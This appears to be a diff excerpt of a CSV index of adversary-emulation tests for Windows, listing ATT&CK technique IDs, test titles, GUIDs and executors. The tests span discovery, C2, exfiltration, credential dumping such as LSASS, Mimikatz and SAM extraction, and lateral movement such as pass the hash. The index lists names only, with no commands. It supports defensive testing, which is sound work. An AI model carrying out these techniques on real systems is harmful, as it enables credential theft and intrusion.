discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
discovery,T1135,Network Share Discovery,7,PowerView ShareFinder,d07e4cc1-98ae-447e-9d31-36cb430d28c4,powershell
discovery,T1135,Network Share Discovery,2,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
discovery,T1135,Network Share Discovery,3,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
discovery,T1135,Network Share Discovery,4,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
discovery,T1135,Network Share Discovery,5,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
@@ -653,13 +347,6 @@ discovery,T1018,Remote System Discovery,4,Remote System Discovery - ping sweep,6
discovery,T1018,Remote System Discovery,5,Remote System Discovery - arp,2d5a61f5-0447-4be4-944a-1f8530ed6574,command_prompt
discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa01aaa-5e13-45ec-8a0d-e46c93c9760f,powershell
discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
@@ -667,27 +354,17 @@ discovery,T1518.001,Security Software Discovery,6,Security Software Discovery -
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt
discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
discovery,T1082,System Information Discovery,9,Griffon Recon,69bd4abe-8759-49a6-8d21-0f15822d6370,powershell
discovery,T1082,System Information Discovery,10,Environment variables discovery on windows,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
discovery,T1614.001,System Language Discovery,1,Discover System Language by Registry Query,631d4cf1-42c9-4209-8fe9-6bd4de9421be,command_prompt
discovery,T1614.001,System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt
discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules,038263cb-00f4-4b0a-98ae-0696c67e1752,command_prompt
discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt
discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell
discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt
discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
@@ -704,32 +381,35 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download
command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt
command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD.exe,1a02df58-09af-4064-a765-0babe1a0d1e2,powershell
command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0deb-4d51-af0f-833d37c4ca6a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
command-and-control,T1090.003,Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
command-and-control,T1090.003,Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell
command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used port with PowerShell,21fe622f-8e53-4b31-ba83-6d333c2583f4,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
execution,T1559.002,Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
execution,T1559.002,Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt
@@ -738,11 +418,6 @@ execution,T1204.002,Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4
execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1204.002,Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
@@ -758,72 +433,76 @@ execution,T1059.001,PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-
execution,T1059.001,PowerShell,12,PowerShell Downgrade Attack,9148e7c4-9356-420e-a416-e896e9c0f73e,powershell
execution,T1059.001,PowerShell,13,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
execution,T1059.001,PowerShell,14,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
execution,T1059.001,PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
execution,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
execution,T1059.003,Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Remote Services,0fd48ef7-d890-4e93-a533-f7dedd5191d3,command_prompt
execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt
execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
execution,T1047,Windows Management Instrumentation,9,WMI Execute rundll32,00738d2a-4651-4d76-adf2-c43a41dfb243,powershell
execution,T1047,Windows Management Instrumentation,10,Application uninstall using WMIC,c510d25b-1667-467d-8331-a56d3e9bc4ff,command_prompt
exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell
exfiltration,T1048.002,Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
exfiltration,T1567,Exfiltration Over Web Service,1,Data Exfiltration with ConfigSecurityPolicy,5568a8f4-a8b1-4c40-9399-4969b642f122,powershell
credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,3,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1110.001,Password Guessing,1,Brute Force Credentials,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
lateral-movement,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
lateral-movement,T1550.003,Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
